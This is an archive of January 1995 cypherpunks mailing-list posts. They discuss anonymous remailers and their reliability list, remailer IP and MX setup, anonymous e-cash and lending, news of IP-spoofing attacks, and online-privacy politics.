>Of course, someone's going to have to package up those IOUs (and make
>people pay interest if anyone is going to make money out of it... (Even
>students pay interest.) Which is why I'm pushing (endlessly, tediously)
>the idea of a special purpose corporation whose job it is to issue IOUs
>(in return for an equivalent amount of cash). The people who buy the IOUs
>get anonymous ecash that anyone (remailers, data vaults, data havens) will
>accept (because it is credible that it will be repaid), and the corporation
>that issues the IOUs gets to use the money it got paid to earn interest
>until the IOUs are cashed in.
>
>>I just wonder who wants to play "collection agency"?
>
>Which is the big problem for community action generally -- as the community
>gets bigger (and more anonymous?) the effectiveness of communal
>disapprobation diminishes (:-)). A special purpose corporation, on the other
>hand, not only has a reputation to protect, and can be sued, but has an
>interest in making its financial/credit rating details as public as possible
>(reassure the customers, and make more intersest income -- although the real
>income is likely to come from fees...)
>
>Cheers,
>
>D.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 23 Jan 95 06:49:56 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501231450.GAA05118@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk pgp hash latent cut ek";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

Use "premail -getkeys remailer.help.all@204.95.228.28" as a stopgap to
get PGP keys for the remailer, at least until Matt Ghio gets his
machine situation straightened out. Fingering this address works too.

Last ping: Mon 23 Jan 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
syrinx   syrinx@c2.org                              #+     4:59  99.14%
penet    anon@anon.penet.fi               *******+****    33:13  99.99%
rebma    remailer@rebma.mn.org            _..-*.--.-   18:00:23  97.74%
rahul    homer@rahul.net                  ****#-** *-#    31:58  96.61%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+#-#* *+*     7:18  96.59%
ideath   remailer@ideath.goldenbear.com   --+---+- ---  1:57:47  96.59%
alumni   hal@alumni.caltech.edu           ++-*#+-- **#    40:31  96.47%
extropia remail@extropia.wimsey.com       ++++++.. +++  5:46:02  96.10%
soda     remailer@csua.berkeley.edu       -..-.._. .    8:44:34  96.08%
portal   hfinney@shell.portal.com         ##- ***- **#    20:48  95.82%
mix      mixmaster@nately.ucsd.edu        +++++--+  ++  1:01:24  95.72%
nately   remailer@nately.ucsd.edu         ++++++-+  ++    48:18  95.72%
q        q@c2.org                         +++--+-- +    1:41:44  95.06%
usura    usura@replay.com                 -  +--+- -**    39:18  93.78%
xs4all   remailer@xs4all.nl               -  *-+++ -**    27:43  92.93%
myriad   remailer@myriad.pc.cc.cmu.edu             ***     4:16  87.80%
vox      remail@vox.xs4all.nl             -- -     --   9:08:07  84.62%
c2       remail@c2.org                     _         + 26:06:32  75.08%
flame    tomaz@flame.sinet.org                   _  -+  9:15:23  34.58%
desert   remail@desert.xs4all.nl          .--____      62:05:22  29.80%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in relpy blocks using Encrypt-Key:
          header.


Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 23 Jan 95 06:58:51 PST
To: remailer-operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211728.LAA04757@jpunix.com>
Message-ID: <199501231457.GAA16462@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "John A. Perry" <perry@jpunix.com>

   > A question, from an internet mail novice:  How does the 'invisible'
   > remailer advertise itself as its 'visible' name in it's outgoing
   > mail?  

Perhaps the easiest thing to do is to add a Received: field to all
outgoing remailed mail so that it appears that the visible site is
handling the invisible site as if it were UUCP or a firewall or
mailhub or something.  Since anybody who really wants find out who
actually owns the machine is going to, you might as well indicate the
real relation up front, namely, that the owner of the visible machine
routs mail for the invisible one.  In other words, there would be two
Received: fields in outgoing remailed mail.  The first (lower, later
in the stream) Received: field would be generated by the remailer
software.  The second would be added by the system sendmail.
It will be tricky to make this look just right.

Another way to mask this is to give the remailer its own IP address.
It's easy to recompile extra slip interfaces into a kernel; each gets
its own IP address.  Routing the output of the remailer through these
extra interfaces can require some hackery, though.  I only know about
this second hand, but evidently the BSDI 1.1 release added some BSD
4.4 feature that makes this kind of IP hack much easier.  

With an extra IP address, you then register a full suite of domain
names just like normal.  This could be a new second-level domain or a
subdomain of, say, techwood.org.  You'll want SOA, A, MX, and PTR
records.  The NS entry for the relevant domains (esp. PTR records)
will generally reveal the computer/network operator, but again, this
is a technical relationship only.  What you have done is pretty
completely separated the technical infrastructure from the remailer
operation.

What we're creating here, of course, is virtual machines.  Unix
kernels have supported multiple processes and multiple users for a
long time.  I expect multiple virtual machines this decade.

   The MX record idea was not 
   meant to totally hide a remailer. It was meant to act as a "casual" 
   mask for the remailer.

And I think this mask is quite good.  It's generally a good idea to
try the easier-to-deploy solutions first and see if they work.  All
the IP spoofing above takes a bit of work to do.  Just using an MX
record and getting a second postmaster address is clearly the first
thing to do.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 04:12:08 PST
To: bal@martigny.ai.mit.edu
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501230617.AA20253@toad.com>
Message-ID: <9501231210.AA10875@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Brian A. LaMacchia" says:
> John Markoff writes in Monday's New York Times about a rash of computer
> security breaches using IP spoofing to penetrate routers and firewalls.
> That's all the technical info I coudld glean from the story; CERT is
> supposed to "make an announcement" later today and tell us what brands
> of routers can and cannot be modified to defend against this type of
> attack. 

The attack is far worse than described in the Times. Markoff didn't
quite understand the full ramifications, or perhaps people weren't
telling him the full story. Its *NOT* just IP spoofing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Mon, 23 Jan 95 04:25:43 PST
To: perry@imsi.com
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501231210.AA10875@snark.imsi.com>
Message-ID: <9501231225.AA07367@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> 
> "Brian A. LaMacchia" says:
> > John Markoff writes in Monday's New York Times about a rash of computer
> > security breaches using IP spoofing to penetrate routers and firewalls.
> > That's all the technical info I coudld glean from the story; CERT is
> > supposed to "make an announcement" later today and tell us what brands
> > of routers can and cannot be modified to defend against this type of
> > attack. 
> 
> The attack is far worse than described in the Times. Markoff didn't
> quite understand the full ramifications, or perhaps people weren't
> telling him the full story. Its *NOT* just IP spoofing.
> 
>

Perry, pray tell, what else was John alluding to?

- paul

 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 04:30:28 PST
To: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501231225.AA07367@hawksbill.sprintmrn.com>
Message-ID: <9501231230.AA10926@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Paul Ferguson says:
> > The attack is far worse than described in the Times. Markoff didn't
> > quite understand the full ramifications, or perhaps people weren't
> > telling him the full story. Its *NOT* just IP spoofing.
> 
> Perry, pray tell, what else was John alluding to?

I'm still trying to clear with my sources who told me in confidence
what I can and can't say now that the article is out. However, the
problem was documented by Bellovin some years ago.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Mon, 23 Jan 95 04:33:51 PST
To: perry@imsi.com
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501231230.AA10926@snark.imsi.com>
Message-ID: <9501231233.AA07438@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> > 
> > Perry, pray tell, what else was John alluding to?
> 
> I'm still trying to clear with my sources who told me in confidence
> what I can and can't say now that the article is out. However, the
> problem was documented by Bellovin some years ago.
> 
> 

Hmm. This could indeed be something of concern, since it demonstrates
that someone is taking great pains to take advantage of the shortcomings
of the IP protocol, if I recall smb's paper content. I'll have to dig
that one out when I get into the office this morning...

- paul

- --
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Mon, 23 Jan 95 08:00:33 PST
To: bart@netcom.com (Harry Bartholomew)
Subject: Re: Call Security (Was: Re: TJOAUC 1-7)
In-Reply-To: <199501231133.DAA14851@netcom15.netcom.com>
Message-ID: <9501231603.AA22524@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


# > 
# > 	This guy showed up in sci.crypt back in November of '94, with the 
# > "Call Security" program. It had some new unknown public-key algorithm in 
# > it that he had designed himself.
# 
# 
#     and on the next page:
#     "8. Is it really secure? You, decide!

okay, I've decided!    --strick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 23 Jan 95 08:15:05 PST
To: cypherpunks@toad.com
Subject: Writer Sets Sights on Net
Message-ID: <199501231613.IAA22198@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I noticed the following solicitation mini-spamming its way into
a number of newsgroups yesterday.  Looks like yet another person
plans a lurid expose of online services, BBS systems, and the Net.

------

From: FMGG44A@prodigy.com (Jerome Haden)
Subject: Writer Seeks On-Line Crime Info

REQUEST FOR INFORMATION

I am currently writing a book length manuscript entitled :

"Crash and Burn:
A Parents Guide To The Dangers On The Information SuperHighway."

I am seeking real events that are "public record" either
newspaper articles or court documents which involve the following
criminal activity:

1.) Sexual predators who have commited sex crimes on minors with
a connection to a local computer bulletin board or a national
on-line service such as Prodigy, Compuserve, or America On Line.

2.) Teenage computer hackers who have been charged with any type
of telephone fraud, unauthorized access to another computer, or
similar crimes.

3.) Any teenagers involved in making explosives with information
obtained from a computer bulletin board.

4.) Any selling of illegal drugs involving minors on a computer
bulletin board.

5.) Any other crimes invloving teenagers as either victims or
perpetrators with the use of modems or any manner in
"cyberspace".

Any information must be a public record that can be verified by
my literary agency and my publisher.

Also would be interested in hearing from victims or perpetrators
willing to be interviewed "off the record", and/or willing to
appear on national talk shows.

If you have any such information please contact me as follows:

Jerome Haden
E-Mail: FMGG44A@prodigy.com

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 23 Jan 95 05:39:06 PST
To: Censored Girls Anonymous <carolb@barton.spring.com>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
Message-ID: <9501231337.AA14968@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Sun, 22 Jan 1995 09:46:26 -0600 (CST)
    From: Censored Girls Anonymous <carolb@barton.spring.com>
    
    Many companies are already founded on "a web of debt".
    "Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
    (Real Estate Loans)," all come to mind at the moment. They're nicely
    formatted, processed and make even more money for investors as the
    interest rates change.

Student Loans (at least GSLs) and GNMA loans are backed by ``the full
faith and credit'' of the US federal government.  As far as an
investor is concerned, loan default looks the same as if the loanee
paid their debt off early.  The `web of debt' suggestion posted here
doesn't seem to follow the same model unless you count virtually every
form of financial transaction -- including buying a cup of coffe with
a dollar bill -- as fitting the model.

As a side note, GNMA (Ginnie Mae) is not for `general loans', but
rather VA and FHA primary residence mortgages with various
restrictions.  GNMA, FNMA (Fannie Mae), and FHLMC (Freddie Mac) all
exist to provide secondary markets for various kinds of real estate
debt.

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 07:18:26 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501231457.GAA16462@largo.remailer.net>
Message-ID: <9501231517.AA11231@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> Another way to mask this is to give the remailer its own IP address.
> It's easy to recompile extra slip interfaces into a kernel; each gets
> its own IP address.  Routing the output of the remailer through these
> extra interfaces can require some hackery, though.  I only know about
> this second hand, but evidently the BSDI 1.1 release added some BSD
> 4.4 feature that makes this kind of IP hack much easier.  

In 4.4 kernels, you just configure an alias address.

For, say, SunOS 4.1.X, John Ioannidis released a virtual interface
driver; I saw the thing posted to the net recently so I suppose its
public now (though I'm not sure J.I. knew that was going to happen.)
Its not hard to set such things up; no real trickery needed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Claborne, Chris" <claborne@microcosm.sandiegoca.ATTGIS.COM>
Date: Mon, 23 Jan 95 16:24:08 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: "Internetpol"
Message-ID: <2F2402AA@microcosm.SanDiegoCA.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain



>Timothy C. May says:
>> Seriously, there is considerable danger that the growing chorus of
>> alarmist nonsense about the Net being used for child porn, for snuff
>> films, for weapons secrets deals, etc., will result in the U.S.
>> Net.Cops linking up with their European and Asian associates.

If the net is dangerous, what about the phone system.  All phones
should be disconnected immediately!  These people need a reality
check.  I'm tired of society do-gooders trying to protect me from myself.

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoca.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 23 Jan 95 11:46:39 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <9501231517.AA11231@snark.imsi.com>
Message-ID: <199501231945.LAA19843@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   In 4.4 kernels, you just configure an alias address.

What is the mechanism by which a particular process picks an outgoing
IP address?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Mon, 23 Jan 95 09:05:54 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <9501231337.AA14968@cfdevx1.lehman.com>
Message-ID: <Pine.3.89.9501231119.A585123998-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sallie Mae's commercial paper is NOT backed by the full 
faith and credit of the US government.  They carry a specific disclaimer 
to that effect.  It is true that many personal student loans (GSLs) from 
banks are guaranteed by the government.  The system was recently reformed 
to remove the riskless subsidy to Sallie Mae, which is 100% privately 
owned, and very profitable.

Similarly Fannie Mae and all other priavetly held GSE's are only backed 
by an "implicit" federal guarantee.  Although the only time one of these 
got into trouble the feds did bail it out.

See my forthcoming article "Reinventing Government Corporations" in the 
Illinois Law Review.  Due out in about three months.

OBCrypto: How big a risk premium would YOU want to lend to an anonymous
borrower?  In practice, for the forseeable future any such lending will
almost certainly be intermediated through a very small number (near zero)
of specialists ready, willing and able to measure and minimize the risks. 
Or there will be ferocious requirements for collateral. 

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's warmish here.

On Mon, 23 Jan 1995, Rick Busdiecker wrote:
[...]
> Student Loans (at least GSLs) and GNMA loans are backed by ``the full
> faith and credit'' of the US federal government.  As far as an
> investor is concerned, loan default looks the same as if the loanee
> paid their debt off early.  The `web of debt' suggestion posted here
> doesn't seem to follow the same model unless you count virtually every
> form of financial transaction -- including buying a cup of coffe with
> a dollar bill -- as fitting the model.
> 
> As a side note, GNMA (Ginnie Mae) is not for `general loans', but
> rather VA and FHA primary residence mortgages with various
> restrictions.  GNMA, FNMA (Fannie Mae), and FHLMC (Freddie Mac) all
> exist to provide secondary markets for various kinds of real estate
> debt.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 23 Jan 95 09:14:16 PST
To: cypherpunks@toad.com
Subject: NYT on Net Threat
Message-ID: <199501231713.MAA20366@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Toad is choking on a try 3 hours ago to send today's Markoff article on the
new Net security threat Brian and others noted. 
 
Nail-biters can get it by email (if this passes the gory hole). 
 
Send blank message with subject:  NEW_hak




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 09:23:13 PST
To: cypherpunks@toad.com
Subject: Perry E. Metzger: I would suggest...
Message-ID: <9501231722.AA11670@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Date: Mon, 23 Jan 95 10:54:16 EST
From: perry@imsi.com (Perry E. Metzger)
Message-Id: <9501231554.AA28483@webster.imsi.com>
To: bugtraq@fc.net
Subject: I would suggest...

I would suggest that people interested in the threat described in this
morning's times find a copy for themselves of Steve Bellovin's classic
paper "Security Problems in the TCP/IP Protocol Suite." It is
available from

ftp://research.att.com/dist/internet_security/ipext.ps.Z

People may also want to examine

ftp://research.att.com/dist/internet_security/117.ps.Z

Perry

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:25:39 PST
To: tcmay@netcom.com
Subject: Re: The Remailer Crisis
Message-ID: <9501232220.AA18684@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes:
> One thing I should've noted is that a Linux-based cheap remailer is
> mostly useless without a "live connection" to the Net. 

I disagree - live connections  are great for fast-response systems,
but we got along just fine in the uucp dialup world with occasional
connections; in an environment like remailers where you _want_
batchy performance, the clunkiness can even be a "feature".

I don't know how many providers are offerring uucp or ip dialout
from their servers, or whether they're much cheaper than real ip,
but you can do ok with, say, hourly polling to a TIA or term connection
to fill your mailbox from a POP server, or nightly if that's enough.

TIA also has the advantage over SLIP/PPP that outgoing mail from your 
system will _always_ have unverifiable IP addresses - you look like
netcom.com, just like everyone else TIA-connecting from netcom does.
And connections from shared-IP-address-pool systems like netcruiser
or dialup PPP systems probably don't do much logging of who's used
what IP address beyond when nameserver caches clear.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:26:36 PST
To: eric@remailer.net
Subject: Re: Data Vaults (vs. Data Havens)
Message-ID: <9501232223.AA18759@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim and Eric write things like:
> I fully concur.  The connotations of the word "haven" imply activities
> that ordinary people don't see themselves doing.  This means that
> ordinary people won't generally use something called a "haven", even
> if they might use exactly the same service called something else.

We can always call them "Private Storage Servers" or some such;
an interesting question is whether the main uses will be
for retrieval by the storer, or by someone else, or by a bunch of others,
and how we describe the service may affect that.
		Bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Mon, 23 Jan 95 12:26:44 PST
To: perry@imsi.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <9501231956.AA12009@snark.imsi.com>
Message-ID: <199501232025.OAA27601@jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9501231956.AA12009@snark.imsi.com> you write:
>
>Eric Hughes says:
>>    From: "Perry E. Metzger" <perry@imsi.com>
>> 
>>    In 4.4 kernels, you just configure an alias address.

That's what I just did on jpunix.com. It now answers to 198.133.124.3,
the block of IP addresses that belonged to jpunix.com. (jpunix had been
using an IP address "borrowed" from work)

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:46:15 PST
To: cypherpunks@toad.com
Subject: Re:  transient guerrilla remailers
Message-ID: <9501232242.AA19112@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Nobody@rahul.net, forwarding from homer's remailer, writes:
> If c2.org can offer RIAB accounts on a pre-paid basis, what's to
> stop people interested in the cause from paying anonymously,
> setting up the RIAB, and just walking away? When the pre-paid period
> expires, the remailer goes away. 

Yeah - John Doe pays in cash, or uses a Post Office money order :-),
to get X months of remailer service.  After the initial account setup,
he can keep it up dated by mailing in mostly-anonymous paper cash using
the usually-anonymous paper remailer service offered by the US government,
dropping the payments in a mailbox.  If the sysadm is trustable, no problem,
and the degree of trust is whatever a month's remailer service costs.
If he's not, John Doe can detect it by occasionally using the remailer,
and can spam the net with scanned-in copies of the money order showing
it's payable to sysadm.  If the sysadm wants to float the (low) cost of
running a remailer for a month, he can even keep the money order around
for a month or so to use as evidence if he's subpoenaed or otherwise legally
harassed.

One concern I have about this remailer strategy is whether everyone's
remailer shows up as their own, or as "nobody" - can you tell 
the nobodies apart?
		
			John X. Doe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:49:51 PST
To: ben@Tux.Music.ASU.Edu
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
Message-ID: <9501232247.AA19217@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > It strikes me that this would be the perfect way to generate
> > consumer interest in anonymous digital cash protocols [. . . .]

> The "cause" will do much better if the first major association is made
> with something much less controversial.  Girl Scout cookies, say. 

Girl Scout Cookies do crumble a bit when crammed through the net,
and it's tough to deliver them to anonymous locations, unlike bits.
And there are moral concerns there as well - not only do their 
"butter cookies" use non-butter shortening (:-), but there's the
problem that it turns the Girl Scouts into a crass commercial enterprise,
just another division of Nabisco, instead of teaching the kids that
hard work will get them a 7 percent margin on their sales.

On the other hand, being able to have Girl Scout cookies or flowers
sent by anonymous donors may go over well in some circles...

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:52:21 PST
To: cypherpunks@toad.com
Subject: Re:  hmmm, port 25
Message-ID: <9501232250.AA19265@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


nutty elf writes, from tower.stc.housing.washington.edu, the message below.
If I'd been watching recently for postings from that machine,
I could point out who he probably was.....

> From toad.com!owner-cypherpunks@ig1.att.att.com Sun Jan 22 03:18:20 1995
> Return-Path: <toad.com!owner-cypherpunks@ig1.att.att.com>
> Received: from ig1.att.att.com by anchor.ho.att.com (4.1/EMS-1.1.1 SunOS)
> 	id AA28663; Sun, 22 Jan 95 03:18:19 EST
> Received: from att!toad.com by ig1.att.att.com id AA09271; Sun, 22 Jan 95 03:20:16 EST
> Received: by gw1.att.com; Sun Jan 22 03:19:52 EST 1995
> Received: from toad.com by relay2.UU.NET with SMTP 
> 	id QQxzth02499; Sun, 22 Jan 1995 03:16:33 -0500
> Received: by toad.com id AA25129; Sun, 22 Jan 95 00:12:52 PST
> Received: from northpole.org (tower.stc.housing.washington.edu) by toad.com id AA24523; Sun, 22 Jan 95 00:10:24 PST
> Date: Sun, 22 Jan 95 00:09:36 PST
> From: nutty_elf@northpole.org
> Message-Id: <9501220810.AA24523@toad.com>
> Subject: hmmm, port 25
> To: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Status: RO
> 
> That's strange, that last port 25 forgery didn't behave as expected.
> Just checking it.
> 
> --nutty elf
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 11:56:27 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501231945.LAA19843@largo.remailer.net>
Message-ID: <9501231956.AA12009@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    In 4.4 kernels, you just configure an alias address.
> 
> What is the mechanism by which a particular process picks an outgoing
> IP address?

Same as always -- the bind system call! (Remember, machines have
always had multiple IP addresses, just not on the same interface.)

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Jan 95 13:06:20 PST
To: cypherpunks@toad.com
Subject: bruce serlings talk
Message-ID: <v01510101ab4986e2944e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Got this from a friend:

>To: rah@shipwright.com
>Date: Mon, 23 Jan 95 09:09:41 PST
>Subject: bruce serlings talk
>
>bob;
>can you get me a copy of bruce serlings talk given to law enforcement
>offcials (at some conference) about computer crime.. I saw it published in
>some rag but I wonder if it's posted on cyperpunks??
>

I saw it here before. Is there a URL for it out there?

Thanks,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
